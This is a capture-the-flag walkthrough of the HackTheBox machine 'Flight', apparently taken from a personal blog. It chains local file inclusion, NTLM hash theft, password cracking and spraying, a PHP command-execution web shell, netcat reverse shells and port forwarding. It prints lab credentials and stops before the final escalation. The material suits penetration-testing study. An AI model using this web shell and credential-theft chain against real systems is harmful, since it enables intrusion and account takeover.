➜ ~

Playing Hacks and Stuffs!

Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Flight HackTheBox

Difficulty = Hard

Nmap Scan: image

We can see the domain name flight.htb I added it to my /etc/hosts file

So there are lots of port but lets start enumerating

Checking smb doesn’t allow anonymous listing of shares image

Moving over to the web server on port 80 shows this image

There’s nothing really there

So lets fuzz for subdomains image

I’ll update my /etc/hosts file with the new sub domain

Checking it shows this image

When I clicked on the home button i get this image

Noticing the url we can see that it’s including the file home.html

We can say that this is vulnerable to local file inclusion lets confirm it image

One way we can exploit this is by trying to perform ntlm hash theft

Using responder i’ll steal the ntlm hash image image

While on the web server I’ll do this image

Back on responder I got the hash for user svc_apache image

I brute forced it using JTR image

Now we have a cred svc_apache:S@Ss!K@*t13

Trying to authenticate to winrm fails image

But we can login to smb using the cred image

It shows the smb hostname as G0 I also added that to my /etc/hosts file

We don’t really have good access over the shares but searching through the shares doesn’t reveal any form of interesting cred image

One thing we can do since we have smb cred is to get list of users on the box via rid bruteforce then perform a password spraying attack image

I saved the result in a file then used bash scripting to get only the usernames there

Command:
crackmapexec smb flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' --rid-brute > brute
cat brute | awk '{print $6}' | grep flight | cut -d '\' -f 2 | grep -v svc_apache > users.txt

Now we can use kerbrute to perform password spraying image

Cool we have another user’s cred S.Moon:S@Ss!K@*t13

Trying the cred over winrm fails image

Checking the perm the user has over smb shows this image

Nice we have write access over the Shared share

But looking at the shares shows that no file is there image

What we can attempt to do is to upload a file whether scf or ini to perform ntlm hash theft

I used this script to generate the payload file image

I had responder listening already and after some seconds I got a hit image

I saved the hash then brute forced it using JTR image

We have another cred c.bum:Tikkycoll_431012284

Using cme i tried if it can connect to winrm but nope it can’t image

Checking the perm the user has over smb gives this image

Nice we have access over the Web shares

Moving over there shows that this is where the web server files are placed image

I uploaded a php command execution script image

<?php
system($_REQUEST['c']);
?>

We can now access it from the web server image

To get shell I uploaded nc to the smb and then got shell from it image image

Shell finally 😃

Lets see what we can do from here image

But what I noticed that the current working directory was C:\xampp\htdocs\flight.htb but there’s a inetpub directory in the C:/ drive

So this means maybe there’s an internal web app running 🤔

Checking that directory shows this image

We can conclude that the only user privileged to access the development directory is user C.Bum

Though we have the user’s cred but since our shell can’t work well when we run runas i’ll need a better shell

Luckily there’s a tool called RunasCs that can help with this

I uploaded it to the box then got to switch to user c.bum image

Back to the web directory it shows the user has write access over it image

So what i did was to upload a aspx shell since the web server will be IIS image

Now lets see if there’s any internal port image

Command: netstat -ano

Port 8000 looks promising cause something is listening on it

And yea it’s a web server image

Using chisel I port forwarded the internal port image

Back on our host we can now access the internal web server image

To access our shell is as easy as going over to /shell.aspx image

I got a reverse shell via using nc image

We can see that we’re user iis apppool\defaultapppool and it’s a Microsoft Virtual Account. One thing about these accounts is that when they authenticate over the network, they do so as the machine account.

From this we can basically abuse this, by just asking the machine for a ticket for the machine account over the network.

The tool that is used is Rubeus

*** NOT YET PWNED ***